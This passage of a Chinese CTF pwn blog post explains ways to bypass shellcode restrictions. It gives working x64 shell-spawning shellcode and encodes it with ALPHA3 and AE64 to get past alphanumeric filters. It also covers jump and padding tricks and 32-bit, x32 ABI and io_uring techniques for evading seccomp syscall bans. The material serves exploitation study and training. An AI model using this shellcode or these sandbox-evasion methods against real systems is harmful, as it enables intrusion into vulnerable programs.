offset ✔ x Alpha3 限制只能使用字母或者数字 alpha3使用: alpha3需要python2环境，所以先安装python2 12345from pwn import *context.arch=&#x27;amd64&#x27;sc = b&quot;\\x48\\x31\\xf6\\x56\\x48\\xbf\\x2f\\x62\\x69\\x6e\\x2f\\x2f\\x73\\x68\\x57\\x54\\x5f\\x31\\xc0\\xb0\\x3b\\x99\\x0f\\x05&quot;with open(&quot;./sc.bin&quot;,&#x27;wb&#x27;) as f: f.write(sc) 1python2 ALPHA3.py x64 ascii mixedcase rdx --input=&quot;sc.bin&quot; &gt; out.bin 可以选择架构、编码、限制的字符 AE64 AE64可以直接在python中导入，使用相对较为方便且限制较少 12345678910from ae64 import AE64from pwn import *context.arch=&#x27;amd64&#x27;# get bytes format shellcodeshellcode = asm(shellcraft.sh())# get alphanumeric shellcodeenc_shellcode = AE64().encode(shellcode)print(enc_shellcode.decode(&#x27;latin-1&#x27;)) 手动绕过 主要是通过sub、add、xor等指令对于非字母数字指令进行加密。 可以先根据限制筛选出受限制后的指令列表，然后根据指令列表进行组合，从而实现绕过。 另一种方法是通过shellcode先实现write读取到shellcode的位置，然后输入新的无限制的 shellcode来完成绕过。 https://nets.ec/Alphanumeric_shellcode 特定位置字符限制 在最近的*CTF中存在一个用浮点数输入字符，并对浮点数做限制写shellcode的题目，实际上是限制了每八位需要有两位是特定字符，这里给出两种绕过思路: 1234mov rcx, im64mov rcx, im32mov ecx, im32mov cl, im16 这里im是可以由我们自由控制的立即数，因此我们可以通过插入这些无关指令填充来绕过限制，上面这些指令涵盖了3、4、5字节，可以灵活插入来达到需要的效果 1jmp short 通过jmp短跳转直接跳过中间指令，从而绕过限制 jmp指令本身只有两个字节，更为灵活。 对于orw的限制 如果程序还对orw等系统调用作出了限制呢？ w的限制还好说，可以通过侧信道leak出flag，而如果禁用了open，orw就 很难进行下去了。 但是还有一种方法。 利用32位调用绕过orw x86与x64的syscall number是不一样的，如果能够跳转到32位执行相应的shellcode，就可一绕过限制。 x86 sys_number | sys_number | | | | | |—|—|—|—|—|—| |3|read|0x03|unsigned int fd|char *buf|size_t count| |4|write|0x04|unsigned int fd|const char *buf|size_t count| |5|open|0x05|const char *filename|int flags|umode_t mode| 而程序是由32位还是64位执行是由cs寄存器决定的，而retfq指令可以对其作出更改，从而切换寄存器状态，所以可以由此实现orw。 值得注意的是, 对于32位程序, 由于kernel 也要对其作出相应支持, 所以内核代码中有一个操作系统层面的arch判断, personality, 这会影响mmap之类的操作 x32 ABI x32 ABI 是一个应用程序二进制接口 (ABI)，也是 Linux 内核的接口之一。 x32 ABI 在 Intel 和 AMD 64 位硬件上提供 32 位整数、长整数和指针。 可以通过 查看内核源代码 unistd_x32.h 查看 1cat /usr/src/kernels/6.4.7-200.fc38.x86_64/arch/x86/include/generated/uapi/asm/unistd_x32.h 123456#ifndef _UAPI_ASM_UNISTD_X32_H #define _UAPI_ASM_UNISTD_X32_H #define __NR_read (__X32_SYSCALL_BIT + 0) #define __NR_write (__X32_SYSCALL_BIT + 1) #define __NR_open (__X32_SYSCALL_BIT + 2) #define __NR_close (__X32_SYSCALL_BIT + 3) 即可以通过0x40000000+syscall_number 来调用一些系统调用。所以可以绕过对syscall的限制。 不过这个特性似乎在大多数发行版中不受支持。 io_uring io_uring 本身可以实现所有orw乃至socket连接操作, 在linux5.xx最少需要mmap和 io_uring_setup 两个syscall, 之后增加了 IORING_SETUP_NOMMAP 则可以只用一个syscall来实现orw 对于syscall指令的过滤 vdso sysenter int 80 tricks 对于一些题目，对shellcode的检查用到了strlen，那么可以通过先使用一些存在NULL截断的指令，从而使得后面的字符串绕过限制。 在无法获取shellcode运行地址时，可以运行syscall，运行后，rcx会被改写为下一条指令的地址。在32位程序中，还可以通过call指令获取将运行地址压入栈中，在64位地址中，可以直接通过 lea rax, [rip] 来获取rip地址 对于需要libc地址的程序，可以考虑通过xmm寄存器获得libc相关地址","categories":[{"name":"CTF","slug":"CTF","permalink":"https://v3rdant.cn/categories/CTF/"}],"tags":[{"name":"pwn","slug":"pwn","permalink":"https://v3rdant.cn/tags/pwn/"}]}],"categories":[{"name":"Fuzz","slug":"Fuzz","permalink":"https://v3rdant.cn/categories/Fuzz/"},{"name":"Pwn","slug":"Pwn","permalink":"https://v3rdant.cn/categories/Pwn/"},{"name":"CTF","slug":"CTF","permalink":"https://v3rdant.cn/categories/CTF/"}],"tags":[{"name":"Kernel","slug":"Kernel","permalink":"https://v3rdant.cn/tags/Kernel/"},{"name":"Fuzz","slug":"Fuzz","permalink":"https://v3rdant.cn/tags/Fuzz/"},{"name":"Coding","slug":"Coding","permalink":"https://v3rdant.cn/tags/Coding/"},{"name":"Pwn","slug":"Pwn","permalink":"https://v3rdant.cn/tags/Pwn/"},{"name":"linux","slug":"linux","permalink":"https://v3rdant.cn/tags/linux/"},{"name":"CTF","slug":"CTF","permalink":"https://v3rdant.cn/tags/CTF/"},{"name":"io_uring","slug":"io-uring","permalink":"https://v3rdant.cn/tags/io-uring/"},{"name":"shellcode","slug":"shellcode","permalink":"https://v3rdant.cn/tags/shellcode/"},{"name":"pwn","slug":"pwn","permalink":"https://v3rdant.cn/tags/pwn/"}]}